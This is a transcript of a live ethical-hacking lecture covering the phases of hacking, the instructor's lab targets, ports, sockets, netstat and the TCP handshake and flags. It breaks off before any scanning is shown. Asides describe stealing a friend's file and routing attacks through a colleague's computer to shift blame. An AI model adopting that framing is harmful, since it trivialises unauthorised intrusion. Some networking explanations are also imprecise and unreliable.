Welcome back to the session, everyone, and very good afternoon for all the faculty and the students. So let's start today's session. Before starting up today's session, let us have a quick kind of a brief about what we discussed in the yesterday's session. In the yesterday's session, it was the very first session. So hence we started with the introduction part, where we discussed about what is hacking, what is cybersecurity, what are the different branches that comes inside cybersecurity, what are the different states of data, then what are the common attacks that people face in the recent years or the current days, and we also spoke about the hacking methodology, and post that, like Sunil sir has discussed about various topics regarding penetration testing as well, where we have covered about vulnerability assessment, penetration testing, why it is required, what is the basic difference between pen testing and our ethical hacking in that context, right? So, as I said in the yesterday's session, we stressed a few things about our phases of hacking, right? So, this is where we discussed about how hacking is carried out in a step-by-step manner or in a phases manner, right? If I, it's, Just to recall that the phase goes like this. The first one would be collecting information about our target. The second one is exploitation, where getting at least a low privileged access on the victim machine. And third would be privilege escalation, where you'll try to gain administrator access through a guest access level, right? So on that, once you have administrative access on the victim machine, we'll typically create a backdoor so that we want to we want to hold that victim machine on our hand even for our future cases as well. So that's the reason we will create a backdoor, and post that we will clear our footprints by clearing out our logs, isn't it? So these were the 5 phases or steps of hacking. Now, these steps can be the first three. Obviously, it is kind of a mandatory steps. Like you have to do information gathering in order to compromise any mission, and even while compromising, you will have to do some attack, or you'll have to exploit a vulnerability. And if you get a low privileged access, you will have to do privilege escalation, all those stuff, right? These three things will be mandatory, whereas the next two part, that is creating backdoor and clearing footprints, may or may not be carried out in the entire operations. Why? Because you only need to create a backdoor if and only if you want that victim machine under your control for the future purpose. Let's say I want to hack my friend's computer just because he has one critical private file. All I need to do in the overall hack is I just need to copy that. I just need to steal that particular file. That's it. It's just only one task. So hence, I will do privileges. I will do information gathering. I'll do exploitation. I'll do privilege escalation, and after that, I'll able to get my required file. But post that, I do not require the permanent access on my system, on my victim machine. Right? He's my friend. I'm just using this file to get my things done. That's it. But I do not want to create a backdoor. So the creating backdoor remains an optional case. Similarly, clearing footprints would also be an optional case under certain circumstances where you're not revealing your original identity. Let's say, for example, let's say I'm not using my computer to hack you. Instead, I'm using one of my colleagues' computer to hack you. So what happens in the logs? Instead of you would be portrayed that in such a way, or the logs would be mentioned in such a way that it would prove that the hacker of compromising your computer is my colleague's computer. So hence, my colleague's computer logs would be present in your system. So hence, I will be safe because I have not done hacking from my computer, isn't it? So this is basically called as proxying. So instead of using my space, my things, my data or my identity, I'm using someone else's identity to hack a system. Typically, this is what we do in proxy. So all your online proxies, VPN proxies, the add-ons that you use to access a torrent or any other website that has been banned in a particular country or by ISP, we typically use proxy. And why do we use this proxy? in order to prevent, or in order to not disclosing our identity. Instead of disclosing our identity, you're using someone's fake identity to access a particular system, and that's basically called as proxying. So if you do not want to create a backdoor, or if you're using a proxy service, in such cases there is not much requirement to perform creating backdoor or clearing footprints. Yeah. Now, the reason why we are learning this hacking is because we want to, technically, we do not want to become a back at hacker guy, or a malicious hacker who tries to harm someone's computer. Our major aim, or our aim currently in this overall session, is to keep ourselves and our knowledge, to increase ourselves knowledge on security, and also building up our skill levels in security field, so that we can be much more employable in the industry, and also having a better knowledge on security, so that we can keep ourselves secure, right? So this is our actual intention is, right? So hence we will be learning hacking in a perspective of penetration testing. So from yesterday's session, you will be having an idea of what a penetration testing is, why is it required, what is basic procedure. Like, you will have to contact to like a stakeholder, and he will define the scope, what need to be hacked, what need to be tested, and what all the vulnerabilities need to be identified, and what would be a scope, right? So whatever issue that you find, you will try to exploit it, so that you can see the depth of a particular attack. And after identifying those loopholes, you will be writing a report, and you'll be providing a report to the original owner, or the person, or the stakeholder, or a CISO, or a manager of a victim computer, isn't it? So we are not going to do hacking and harm any person, but the mode of learning these concepts, obviously it will be hacking. So this knowledge is something like a sword which is sharpened on both ends, right? We got as do tari tawariya, right? So the sword which has the sharpen on both the sides. So with the sword, you can also prevent yourself from being killed, or you can also kill someone, right? Exactly the same way. So this knowledge can be used against you, or it can be used to protect you as well. So our intention is to keep this thing, to learn knowledge in a penetration testing way, so that we can identify the loopholes in our systems, or our employing companies, or the target which we are trying to hack, and we'll write a report to the actual service provider, or the company which we're working on, right? So in the overall case, the phases would be exactly same. The tools that we use will be exactly same. The attack that we'll perform will be exactly same. The mode or method the method and methodology that we are going to work, everything will be exactly same. The only thing is the intention of the overall hack is different when you think yourself as a penetration tester or a white hat hacker, and it is different when you are a malicious hacker or a black hat hacker. Clear? I hope the context is pretty much clear. Now let us understand what we are going to see, or what we are going to learn in today's session. Okay, so in today's session we'll try to cover all these 5 concepts. Okay, we'll try to cover all the 5 concepts, or all the 5 phases. Obviously, this cannot be too much elaborate, because we have around like 4 hours, less or minus, overall case, and we are trying to grasp on a huge amount of knowledge. So obviously, it may sound like an overview. Yes, someone is trying to speak. Okay.
Participants may please mute your mic, please. Let there not be any disturbance. Thank you.
Thank you.
Yes,
yeah, thank you. So yes, so in this overall session, in today's session, the agenda would be covering out the entire 5 phases of hacking. So our intention would be, you have a friend, probably a friend on a friend's computer, which is remote in your case. That is, your friend's computer is somewhere located in a network. So that's what we assume here, and you are trying to hack that particular friend's computer. So there's in your current case. If you pick up that directly to a corporate level or an organization level, we are trying to perform a penetration testing or assessment, so that we can find a loopholes on a target computer, right? And we'll try to exploit and gain a POC. So what happens in corporates in penetration testing, or what is our daily life job, specifically on my side? So our job is to, we will get a target. So my company will give me a target computer. We will have to completely analyze. As you can see, you made a like as continuing from yesterday's penetration testing concept, there would be black box, white box, and gray box. So either we would get a white box scenario or a black box scenario, or sometimes we may even get gray box, where you'll be having a basic information, and every other information need to be gathered by yourself, and you have to identify the loopholes, and then you have to exploit the machine and give a proof of concept stating that you have exploited that particular mission. Clear? So this is what our today's agenda. So we'll be having our target computers. We will need to gather information. First and foremost, we need to gather as much as information as possible regarding our target. And once that is done, we'll go and we'll exploit. Once we have enough information, we'll go and exploit that particular mission. In certain cases, if it is directly giving us administrator, we'll get administrator access, or else we will have to perform privilege escalation. Now, creating backdoor and clearing footprints is up to you. I'll give you a few commands and I'll give you a few hints how you can create a backdoor or clear footprints, but that depends upon you, whether you want to do it or not. But the first three will have to surely do it. Clear? So hope that today's agenda is pretty much clear. And we'll be seeing a lot of different concepts, a lot of tools. I mean, at least 3 to 4 tools. 3 to 4 tools minimum. And you'll be seeing a different diversified knowledge. So obviously, I'll try to go as low as possible. And I'll be trying to cover almost all this information regarding the 5 phases of hacking. But at any point of time, if you have any queries, please write the queries in the chat box. If you're not able to get anything, please let me know that in the chat box and in the overall flow, so that we can clearly gain as much as knowledge as we are going to distribute in today's session. Clear? I hope today's concept is pretty much, today's agenda is pretty much clear. We'll have 2 target missions. Let me also specify that. So in my lab, I have 2 target missions. Right? Victim 1 would be a Windows 7, a 64-bit Windows 7. I think it's Windows Ultimate. Okay, this layering, and I'm using another victim, which is by name it's called as Metasploitable, but it's actually a vulnerable Linux machine. So basically, for practicing your hacking skills, there are various victim computers. So I'm using such a victim computer so that we can understand how hacking works or how penetration testing. So it's a simple way. So the knowledge is exactly same for both penetration testing or hacking. If you do it in a professional way by asking the permissions, by having a written permissions, and you write a report and submit it to the rightful person, that is called penetration testing. You use it for your own personal gain. You want to steal data and you want to blackmail a person, or you want to steal the data and use it for yourself. That's called hacking. That's the only difference. But the mode, methodology, tools, knowledge, skill level, everything would be exactly same. Either you call it as penetration testing or you call it as hacking. Okay, guys. And again, as I said, this will be the 2 victim computers that I'll be using. I have a small lab setup in my computer in my premises. So I'll be using that. So let me give you IP address as well. So I would consider this overall scenario as a gray box testing, because the only information that we have regarding our target is its IP address. Okay, and that's it. So they have given us the IP address, and we are going to do the testing, and we are going to find loopholes, and we are going to compromise the mission. And we are going to give them a proof saying that I have hacked this mission, and this is the proof that I have hacked this mission. Okay. Now, what all the steps are involved in that we will see in the overall process. Clear? So I hope the context is pretty much clear. If anyone is not able to get it, please let me know that. Okay. So far, there's no any queries. So if you have any queries, you can mention the queries in the chat box. Okay. So that's great. So let's go forward. Just to give you a hint, so my lab setup would be of this case. Let me. Okay, here it is. Okay, so I have given you a hint about my lab setup yesterday. I have a similar lab setup today as well. So I'll be using Windows 10 for my screen sharing. As you know, few of the components are not working in Kali. That's the reason I'm using my Windows 10 as my a machine through which I can share my screen. The actual lab is set up on a different computer, which is running Kali Linux, has a host operating system, and inside VirtualBox, I'm running both Windows 7 and Metasploitable. Both are running on inside of VirtualBox. Okay, and I'll be directly accessing Kali Linux. That's the only machine on which I have credentials. The remaining two machines, I do not have credentials. I only know the IP address, except that I do not know anything. It's completely a gray box, or you can also consider it as a black box because I don't know anything else except the IP address. Clear? So that's great. So let's go forward. So let us see what are the steps that is required to perform our testing today. So in other words, what we are trying to do is we are trying to compromise a mission and take those two missions under our control. So ultimately, we would be able to gain control over Windows 7 mission. That means we'll be able to control the entire mission, and we will be able to control another mission called as Metasploitable. So Windows 7 is a Windows-based machine. Metasploit is a Unix-based machine. So I'm taking two different operating systems, so it will be helping you in future days. Clear? That's great. So let's go forward and let's start with our information gathering phase. Okay. As I said, information gathering would be the very first step, and that's a step which consumes most amount of your time in the overall phase. Okay, around like 70% of the overall time. So let us go forward and let us see how this thing goes on. And just to help you a bit, I'll be using another notes. Let me make a note. It's always a better idea to make notes of whatever you do. So let me make this notes. Let me show it. I'm using this. This is like a kind of a territory is a kind of a note making application. So which will capture your report and your images, so that it will be helping you in the overall process of how to recreate the scenario. So whenever you do a bug bounty or when you go for a corporate or pen testing level, your reporting makes a very wide impact. So whether you hack the computer or not, that does not make a much difference, because your report makes a very major difference, right? So it's always necessary to write your report in a proper format. Hence, I'm using this application so that I can organize my report in a pretty good format. Okay. So I'll have two missions. Let me put the IP address here as a indicator, which is not right now. Another IP is 192.168.43.134. Perfect. Save it. And testing. Let me put BMSIT. Okay, let's just for an example purpose, I'm just assuming that it's two computers. So BMSIT has given us an assignment to do a pen testing on their two computers. So they have given us the IP address, and we are going to do testing and give them a report saying that these are the loopholes you have, and this is the depth of this is the depth of a particular attack. Clear? So the concept is pretty much clear. Let's go forward and see what steps need to be carried out. Okay, so as I started in the today's session, information gathering the very first step in the overall phase, but even this information gathering has different internal steps. Okay, so information gathering as a wide, it means capturing as much as information as possible regarding your target, but internally it has also been segregated into different parts. Okay, so if you just remember for a while about our yesterday's discussion on the bank robbery part, right? So we were understanding the 5 phases of hacking through the robbery activity, isn't it? So where a robber's job, and we were comparing the 5 phases of hacking with the robber's phases of robbing a bank, isn't it? In the process, if we go back to the same example, so a robber will, whenever a robber tries to get some more information about the bank. So if you remember, what all type of information will he gather? He'll try to gather how many doors that a bank has, how many slots, or what are the different ways how someone can enter into the bank. So we'll try to fetch out what are the ways how can I enter into the bank, right? Because only if we can enter into the bank, only then we can plan well so that we can steal the money and get out easily. So the entry points and the exact exit points plays a very vital role in your overall information gathering, isn't it? Because that's how someone can get into the bank. Exactly like that, even on computers, there are various entry points and exit points. So in the overall process, finding these entry points and exit points is also a very vital role. And this process of identifying entry points and exit points is what we call as port scanning. Let me give you a brief idea about this port scanning, and let me give you why this port scanning is very much necessary. Yeah. So port scanning, when I say port scanning and whatever things I'll be capturing today, it will be consuming a lot more, it will be brushing out a lot of your networking knowledge. So this ports, services, or flags, TCP, all those things will be brushing out a lot of your networking knowledge. So in case I'll try to cover as much of surface as possible so that it can make sense to you. As you can see, as you may observe, I'll be taking some generic example, a layman's example, so that you can clearly understand this pretty much efficiently. Okay, so let me go one step back and come to networking, and then come back to security, so that we can relate this to our entire flow. Okay, so just to give you an end. So behind every connectivity, so when we say when we can hack a particular computer, what is some mechanism, or what is how can I say that I can hack a particular computer? So to perform or to hack any particular computer, you require a connectivity between the two computers. Just a sec. Here it is. Okay. So if you want to hack one computer from your computer, you have to always make sure there is a connectivity between two computers. Now, the study or the domain which handles this, that there are connectivity between two computers is nothing but your networking. The entire networking tree deals about how can efficient communication happen between two computers. That's what the entire study of networking is. Whether your server, client, optical fiber, LAN, Wi-Fi, your encryption, decryption, all those XYZ stuff depends. At the end of the day, they are nothing but they are supporting that two computers can talk to each other in an efficient way. That's the entire networking, sir. So networking tells us, or will handle, so that we'll see that two computers can communicate to each other in an efficient way. As example here, we make sure that system A can send the data to system B efficiently or not. That is completely handled by your networking. So they're using Ethernet, Wi-Fi, optical fiber, like a wireless signal, or using a traditional old cable TV network, or using telephone network. It does not bother at all. All it needs is that it just has to confirm that whether the packets from A to B are going in an efficient way or not. That is the only thing your networking cares about. Okay. This way of communication, it will use various different topics, various different medium, and all those XYZ stuff to do that particular part. Okay, but how the actual communication happens? So we say that the packet will go from your computer, it will go to your router, then it goes to your computer, and then goes to somewhere else, and then it reaches your computer, isn't it? This is what we technically say, and this we call it as communication. So if you recall back to the same image, sorry, I think I get back to this image. If you go back to the same image, you are one computer, and there's another computer. This is the only thing you are aware. So in our own entire communication, my laptop is talking to your mobile phone or laptop. That's the only thing we are considered about it. But in this overall communication, there will be at least 20 to 30 different network devices. But we are not concerned about it. And since this entire session is real time, we don't even come to know that there are so many devices, right? Because this is the beauty of networking, and this is how it is handled. Okay, so that's a broader way of networking. So obviously we will not go deeper into that. We just want to understand how two computers can communicate to each other, so that we can clearly understand how we can hack a computer. Because always understand is one of the common element I would say is whenever you want to try to hack something, the best way to identify or to check out how to hack a computer is first completely understand how that particular element or device works. So if you want to understand how a computer can be hacked, first must perfectly understand how the computer works, understand the flow, understand the process, and in the process or the flow, you will find one or the other loophole or vulnerability, what we call it as insecurity. So using that loophole, you can exploit a vulnerability. So understand the point to be taken here is when you want to hack a computer, make sure you understand how the computer works. That will give you a complete idea how to hack a particular computer. As simple as that. Okay. So now let's understand how two computers talk to each other so that we can go forward and learn what hacking is. Clear? And again, guys, at any point of time, if you have any queries, please punch in the queries in the chat box. Okay. So just give you a hint. Let me give you one single idea so that how we can easily understand about how two computers communicate to each other and what are their basic parts. Okay. So here I'm just using one of the slides that I've created for a different purpose, so that it just serves the purpose of understanding how two computers communicate to each other. Okay. So just to understand how two computers communicate to each other from a scratch, I'm just taking a very simple example of how two humans communicate to each other. We humans communicate to each other via ears and mouth. So when we say that one person is talking to another person, we say that this guy is talking to that guy, right? So when I say talking, that means that he is using, like for example, in this case, user A, the left guy, is using his mouth to send the information to user B on the right side, who is receiving this information using his ears, isn't it? So left person is talking to right person. That's how we identify the two people, user A and B. But what is the mode they're using? Is they're using their mouth and ears to the communication. So whenever a person is sending information, he's using his mouth. Whenever a person is receiving the information, he uses his ears. If you elaborate this communication, it would be in such a way that user A is using his mouth to talk to user B, who is listening the communication via his ears. So in this oral communication, we can say in other words that user A is using his mouth to send information, where user B is using his ears to receive his communication, isn't it? So we humans have a liberty of using two different elements to send information and to receive information, but computers do not have that liberty. Okay. So while going back to again to the same communication, when the same person is responding back to you, so previously whoever was sending information, he will use his ears to receive the information, whereas the other person who is receiving the information, he will use his mouth to send the information, and vice versa. This overall circle repeats every time. So whatever organ I use to send information, I'll be using a similar organ to receive information. And the same thing happens on the other side as well. Coming to computers, we humans have this liberty of two different organs, and we can communicate to each other in an efficient way. But computers have few more liberty, that computers have around like 65,535 different elements so that they can communicate to each other. And as a disadvantage that we have one ear and one mouth, so we use ears to listen and we use mouth to send information. But for computers, they have to use the same port for sending information. They have to use the same port for receiving the information. Example, you can compare this slide with something like this slide, right? Which is something like, so here you can see user A is sending information using a port called 1234, and user B is receiving information by 5678. When the communication is responding back, where the user B is responding back to user A, that time what happens? So if you observe, it's exactly the same port. If you observe the left side and right side, it's exactly the same port, which means whatever port I use or whatever number of the port I use for sending information, I will be using the same number for receiving the information. Okay, so this is how the entire networking works. And the combination of this port and the IP address is what we call it as socket. Okay, let me show you what these ports are. So in your laptop or a desktop, you might have seen various different ports, isn't it? The USB cable port or USB socket or charger socket or serial cable socket. your Ethernet cable socket, all these XYZ sockets, isn't it? These are exactly called as physical ports. And why do we use that? We use these ports so that we can interact data between our computer and any external device, isn't it? To connect your mobile phone, to connect your printer, to connect to your router, right? So these are all our external devices. So you use these ports so that you can communicate from your computer to these external devices, right? So this is the physical device, physical ports, and the ports or sockets are basically called as physical sockets or physical ports. We have exactly the same type in logical communication, right? So logical communication means whenever your computer is talking to another computer through any medium, it could be LAN, Wi-Fi, all these XYZ communication mediums. So whenever your computer is talking to another computer, it will use any one of the 65,535 ports. Clear? So that means that whenever your computer is talking to another computer, it will be using some amount of some number of ports. Similarly, even it is receiving information from any of the computer across the world, it will be using one of these ports. Which means whenever any communication that happens in a computer, it will happen through this port only. Which means we can consider the ports as the door of your computer. So which means the computer, unlike like humans, we have one or two doors to go outside and come inside, isn't it? Of our house. But the computer is a kind of a house which has 65,535 different doors, which is used while going out or coming inside of the computer. So any communication, it has to go through our port and it has to come through a port only. Yeah, guys. I hope it was pretty much clear about why ports are used and what is ports. If you have any queries regarding the ports, please let me know the ports. Please let me know queries in chat box. Now we discussed about the port, isn't it? So which means we have gained some idea about that. Any computer that any communication that happens to your computer, it has to happen through some ports. Now, how do I simply verify it? Let me give you a very simple example so that you can easily identify. Go to your command prompt, your CMD, any command prompt. If you're using Unix, use Unix command prompt. If you're using Windows, I hope everyone would have using Windows command prompt, Windows. So go to your CMD, click on start, type CMD, hit enter. You get into this nice looking black command prompt. Just type netstat -ANO, just hit enter. Ouch. My mistake. This is small typo. Let me clear the screen so that it does not give you issues. Simple command. Okay, your system is very busy and very talkative person, right? So it's not like obedient students. They are very much talkative people. So how can you make out information of this? Very simple, a very simple way. The first column tells you that what protocol there is talking. So I'll come to the protocol in a few seconds, but first column tells you what is a protocol. Second column tells you what is your IP address and what is your port number. In detail, it tells you what is your socket. These are all sockets. Whatever you see in the left, everything is socket. The right side says to which computer is talking. So if you have written a letter to anyone, you always have from and to address, isn't it? Similarly, whenever a packet is going from one system to another system, obviously it will have source and destination, which means which is your IP address and which is the other person's IP address. So here, the local address means your interface and the socket of your system. The foreign address means the other person's details. So this is your socket, the IP address and port number combination, and foreign address is the other person's to whom you're talking, that person's address and his socket. And clearly state means what is your communication status, whether you're listening, whether you're waiting for someone to connect, whether you're already in the communication, whether you have terminated the connection. So let me add the states here so that it makes an idea for you. Let me put command to check your network activity is cmd / you can use netstat -ANO and different sorry, states in network, what is this, network activity. So where when it says listening, you have established, you have time wait in certain cases, you have close wait. Okay, so listening means you are waiting, you're waiting for someone to send information. Okay, established means that you're already a part of a communication. You're already, so your connection has established, sorry, my mistake, and you're having your connection is established basically. You're having the communication. That's what it means. Time wait is you're waiting for the connection. You're waiting for the connection to be connected, which means, so there's a difference between listening. Listening is you're waiting for someone to get connected, but in time wait, you're waiting for the connection to be established. Established. So you've already initiated the connection and you're waiting for the established. Close wait is basically you're waiting for the connection to be terminated. So obviously, when you're once you're terminated, the log or the status will not be visible to your system. So there are different ways how we can easily identify the status, and this is the way how we can easily identify how the communication is happening. And if you observe over here, so since we are everyone are talking to Google, right? So you can see these are the different packets that is going from my computer to Google server. I can say this precisely. This is obviously precisely my Google, right? So you can see the port number. This is my IP address. My Windows 10 computer's IP address. 192.168.42.91 colon 60800 from this particular socket to 194.30.55 or 200 colon 443. The packets are going, and again same time for a different computer the packets are going, and so on. So these are the different packets that are going from my computer to this computer. So this clearly proves that whenever a communication has to go on, the communication always goes from one socket to another socket. Now, what is socket? Socket is a combination of your IP address and the port number. Okay. Now, what is port number? Port number is a gateway, or I would say port number is a port is a door of your computer through which a communication can enter into your computer. As simple as that. Clear? So hope the concept of ports is pretty much clear, because to understand hacking and to learn about anything that in hacking, you will have to, or in networking, or if you want to understand anything on networking or security, ports is the base concept for you. So hope the understanding of ports is pretty much clear. Please let me know if you have any queries, guys, so far. Any queries so far, guys, about ports? Okay. Guys, am I audible? I don't see any queries. Okay. Mostly fish notes. Guys, am I audible? Or everything going fine? Because I don't see any queries.
Yeah,
Bharat, you're
Yeah, thank you. In that case, I assume that it was pretty much clear and straightforward for everyone. Thank you, guys. So let's go forward. We cleared about ports. Now, why do we need to learn about ports if you are learning about hacking? It's pretty straightforward over there. So what do we assume that if a door is open on our house, which means we are waiting for someone to come inside, isn't it? So obviously in the urban areas we do not open our house and sit as it is, isn't it? So whenever someone is coming to our house, we'll be opening our doors, and once he goes out, we'll close the door, isn't it? The same thing happens even on computer as well, right? So every port that is open on a computer resembles that something or some service is happening on a computer. Now, what do you mean by service? Service is basically an activity, a network activity that is being performed on your computer. Like, which means, let's say, for example, email. or email is a service where you will be sending and receiving emails. Similarly, a file transfer. So you will use you might have heard about FTP servers, where you will be sending files and receiving files. You might have heard about website or web service, where you will be hosting a web page and people can use browser to connect to your computer and receive the data. Right? So this is basically a service. Service is basically a network activity which is performing a various activity on a system. It is using some communication media so that it can exchange data. So when I say when a particular port is open or one of your door is open on your computer, that means there would be some or the other service running which is waiting for someone to connect and establish the connections. Clear? That is what we mean when a particular port is open. Clear? So hope ports are pretty much clear. The meaning of ports, why ports are used, what is service. Hope all those concepts are pretty much clear and straightforward to you guys. Okay. So before going to the forward part of port scanning and different category of ports, let me give you an idea about few things about TCP. Obviously, you might have learned various topics and various things regarding TCP in your academics, like the three-way handshake, all those things. Let me give you a simple hint, or just let me just brush up the three-way handshake so that it will help us in our current scenario. Right? So I'm already talking about TCP here because obviously I'll just brush up a bit of hint on both the cases. Just to give a hint, a protocol is nothing but a simple set of rules of the communication to define how the communication can be handled. As simple as that. If you recall, the very first day, that is yesterday, of the session, Aparna ma'am has given us few instructions about the session, isn't it? The session should be started at this particular time, it will be ended at this particular time, and they'll be sharing you like an agenda for the overall sessions, all those things. That defines how the session will be handled. Exactly like that. Protocols defines how the communication of one computer to another computer will be established, how the connection should be, how the traffic will be handled. Clear? In the protocols, we have two major categories. Obviously, there's huge amount of categories. Inside that, we have two major categories called as TCP and UDP protocols. Obviously, these are not dedicated protocols. These are a set of or a type of categories in which you will have an enormous amount of protocols. This is only giving you a broader set how two computers can communicate. Inside that, you'll come across HTTP, FTP, SSH, SNMP, all those XYZ stuff of protocols. Okay. So TCP or UDP will only give you a two category of protocols. Just understand that way. Okay. So just to give a hint, TCP, obviously you would have learned that it's a transmission. It stands for Transmission Control Protocol, and it is like a communication-oriented protocol where the intention of TCP is to have efficient connection between one computer to another computer. So wherever you see the communication efficiency is very much important, in that case we'll use TCP. Coming to UDP, UDP is a user datagram protocol which does not care anything about whether the data is received to your end or not. Its job is to just deliver you the packet, and it'll just deliver the packet and it'll just leave it out. That's how things work on. So wherever you need speed, wherever you have speed is a major concern, you go across UDP. Clear? So TCP is it's a connection-oriented protocol whose intention is to have efficient connection. UDP is user datagram protocol whose intention is to have faster connection. Clear? As straightforward as that. Obviously, I'll not go much more deeper into it. I'm only taking you only the brushing up of the overall layers. Okay. Now, since UDP is not much efficient kind of a connection, it just only shares you data. In hacking, we may not find much of the vulnerabilities in the protocol itself. Whereas the TCP, it cares more about the efficiency of the connection, or it cares more about features and availability of the connections. So hence, it involves a lot of cross-checking mechanism and a lot of error handling mechanism. And because of this cross-checking, error handling, and all those stuff, it is very prone for a hacker to manipulate these packets and perform various attacks. There are different ways how you can use or how can you manipulate these TCP packets to hack to use these packets on your own good to yourself. Yeah. So let us see one of those things. So before understanding how to use these TCP protocols to for our own sake, let us understand how this basic TCP connection works. Okay. So I said that whenever two computers talk to each other, they will talk to each other based on the port, isn't it? So so you will check that your port is open and you'll send your information to another person. If his port is open, you will have a communication and the communication will go very good and efficient way, right? Now TCP and UDP defines how these communication can be efficiently performed, right? That's what the job of TCP or UDP. So how TCP works, just to a hint of that. So basically TCP is a very obedient guy, a very nice student. So he sees whenever he sees his lecturers or student, whichever he sees his lecturers or principal, he will greet him. So before talking to other person, he will greet first, and then he will start the communication. So TCP is kind of an obedient guy. Let us assume this way. Let us understand the TCP in a simpler fashion. Let's say you are a client, you are a normal computer, and you want to talk to a web server. Obviously, one of the common port that we use for web servers are port 80. So let's assume user A wants to talk to user B on port 80. Always understand every communication will happen through one or the other port, and it will only take one port at a time. Yeah. So user A will use some XYZ port, but he wants to talk to on user B on port 80. He's selecting the mode as well. So obviously he wants to talk on port 80. So he will first greet, saying that, "Hi B, I want to talk to you on port 80. Are you available?" Obviously, in English or any kind of language, it's a very big sentence, isn't it? But computer is more efficient guy, so you will make the thing shorter, and it will only indicate that by using a word called SYN, or it's basically a flag called SYN flag. So as soon as there is a SYN flag, SYN packets goes from user A to user B on port 80. That means as soon as a user B receives this packet from user A, it hits his mind that saying that user A is trying to connect to you. That's what it means. Saying that, "Hey, hi B, I want to talk to you on port 80. That's what it means typically. Now, there are two possible ways how B can respond. One, if he's busy and if he's free. First of all, if he's busy, obviously he'll say that, "No, I'm not available, get lost," right? And B will do that by sending reset packet. When he's busy, or when the port is closed. Clear? Obviously, what is the meaning of busy? When the particular port is closed. If a port is open, obviously he will respond back, isn't it? Because what is the meaning of a port being open? That means there is some service running on it, which means there's some application or some activity running on the system to respond to the incoming connection, isn't it? So now if B is open, you will send SYN plus acknowledgement. So along with the SYN packet, you will send an acknowledgement packet saying that, "Hi, hey, I have received your data and I'm available, so kindly you can connect back to me." That is what it means when someone sends you a SYN plus acknowledgement. Clear? So after receiving this packet, okay, you'll come to know that, hey, B has confirmed me that he's available. So let me start the data. But before that, I cannot directly start the data. So you will greet him back saying that, "Thank you very much for sending me this response. Now, after this packet, I will send my packet later," which means he will greet between each and every communication. And this way, so basically, if you see, there are three packets sent. First, A will send to B, and then B will confirm back sending SYN plus acknowledgement, and A will send back acknowledgement to B, stating that, "Thank you, and I have received your packet," which means always understand acknowledgement packet indicates that the previous packet was successfully received. That is the reason in every TCP packet, in TCP protocol medium, so after successfully receiving every packet, he will send an acknowledgement. It is as similar to when you send a message to your friend, you will get back the response, right? The message sent or message delivered. That is how acknowledgement is in a simple or in a layman's term. Okay. So hope obviously it was just a brush up of three-way handshake. Now, so always we have learned about that these are different packets or different things, but technically these are actually not packets. They are nothing but flags. Now, why these flags are used? As I said, TCP is major aim is to have an efficient connection between the user one to user two, isn't it? So it is very much worried about how the communication can be efficiently forward. So it will keep on tracking its communication. Okay, it will check whether the communication is going good or if it is going efficiently or not. To track those status and to provide priority, it will use its own flags. So basically, TCP uses 6 of its flags majorly. It uses 6 of its flags to have an efficient connection or to track its efficient connections. So this is obviously a practical use of TCP. Obviously, when you go for research purposes, when you study more about protocols, you'll go much more detailed about it. I'm just explaining in the perspective of understanding port scanning and understanding hacking into the career. Okay. Obviously, when you go deeper about protocols, when you go deeper about TCP/IP as a specific topic of your research or as a subject, you will have a detailed understanding. And obviously, in that case, it may drag you to the even the nooks and corners of those packets. But here we are not going deeper. We are only scratching the surface. So hence, the intention over here or the context here is to understand the port scanning and its process. So hence, it is necessary for us to understand these flags. In a simple format, we can understand the flags are the way how you can identify the status of the communication. As simple as that. Now, how can I understand the status of the communication through these flags? Because these flags, each flag indicate a particular like kind of a reason or a kind of a status. Obviously, when you're going through microcontroller programming, microprocessor programming, you might have learned a lot about flags, right? So you have something similar to the flags over here as well. So let us understand each flag so that we can easily, efficiently understand what is port scanning. Clear? So the first flag. So I'm talking about I'm not talking about all the flags. I'm only talking about the flags which will be useful for hacking and the other cases. Okay. So majorly we always use these 6 flags: SYN, synchronization, ACK or acknowledgement, reset, finish, urgent, and push. So that means each flag would be having its own reason or status. The first flag, that is SYN flag, indicates that it's the initiation of the connection, which means whenever you want to initiate a new connection on a TCP protocol, we always use SYN flag. That is the reason why we use SYN in the first case. Okay, this is why we are using SYN flag. Next comes acknowledgement. So whenever a packet is received, it is used to acknowledge to the sender, stating that your packet was successfully received. Next, reset. Reset is used to reset the particular flag, reset a particular connection, restart the particular connection, or terminate the particular connection. Finish is exactly the opposite of SYN flag. SYN flag is used to initiate the connection. Fin is used to initiate the end of the communication. Okay, it is used to initiate the end of the communication. As simple as that. Coming to urgent, urgent is basically a flag in which we use to specify the priority of the data during transmission. Always understand your computer is not not always functions in a first in and first out fashion. It will not process all the data that it has been received in the first case. Always understand, whenever data is received in a computer, it will be received onto the queue first, and then based on priority, based on the time availability of your processor, the instructions or the data will be picked, right? In that process, urgent flag specify that this particular packet or one of the particular packet has more priority during the transmission. Which means, let's say in a traffic signal, there are 100, let's say there are 10 vehicles withstanding the signal, withstanding the traffic signal, but the one which has more priority is whom? The ambulance has more priority. So hence, in this case, the other people will leave out space so that ambulance can go forward. Obviously, it does not happen everywhere in India, but that's what the indication is, isn't it? Which means it's urgent flag always understand this with an ambulance. Okay, so where every packets are going towards, ambulance are more priority to go forward. Exactly like that, whenever there are packets transmitted, the packet which is urgent flag enabled, that flag will go to the destination faster. As simple as that. Next comes the push flag. So push flag has similar characteristics of urgent, but it is used to specify the priority of the data while processing. Okay, urgent flag is used to specify the priority during transmission. That means either the person who has been there, if there are multiple people who are transmitting, the urgent flag has more priority to reach the destination faster. Whereas push is if there are 100 people waiting for a processing to happen, this packet has more priority so that your processor picks this process. So always understand urgent flag is like an ambulance who has more priority in the traffic, and push flag is something like a senior citizen. If there are 100 people who are standing in a queue, the person who has more priority, who will be served first, is obviously a senior citizen because he cannot wait for a longer period. So he will be processed first. So that's what the indication of push flag or urgent flag. Clear? Let me again give you a hint. SYN flag is used to initiate. It is used to specify the initiation of the connection. Acknowledgement is used to acknowledge that the previously sent packet was received efficiently. Reset flag is used to reset the connection. Okay. Finish flag is used to initiate the end of the connection of the communication. Urgent flag is used to specify the priority of the data during transmission. Push flag is used to specify the priority of the data during processing of the CPU, processing by the CPU. Clear? Hope so far it's pretty much clear. Now let's come to the protocols, which is one of the major part in terms of port scanning. Now, as I said, every port indicates that there is some services running on a computer. Now, also said that whenever a computer communicates to another computer, it will be talking to one of the different ports. Okay, so in the communication, there are always two types of communication. Okay, so always understand in systems there are always two types of communication, that is server and the client. Okay, the person who is asking for the information is basically a client. A person who is sending information is a server. So let's take a very blunt example as our current state, right? So in our overall process, we are around 94 people in today's session, excluding me. There are, let's say, 92 people, excluding two of the faculty guys. So let's say there are 90 students, right? So all the 90 students are listening to the session, right? Which means you are waiting 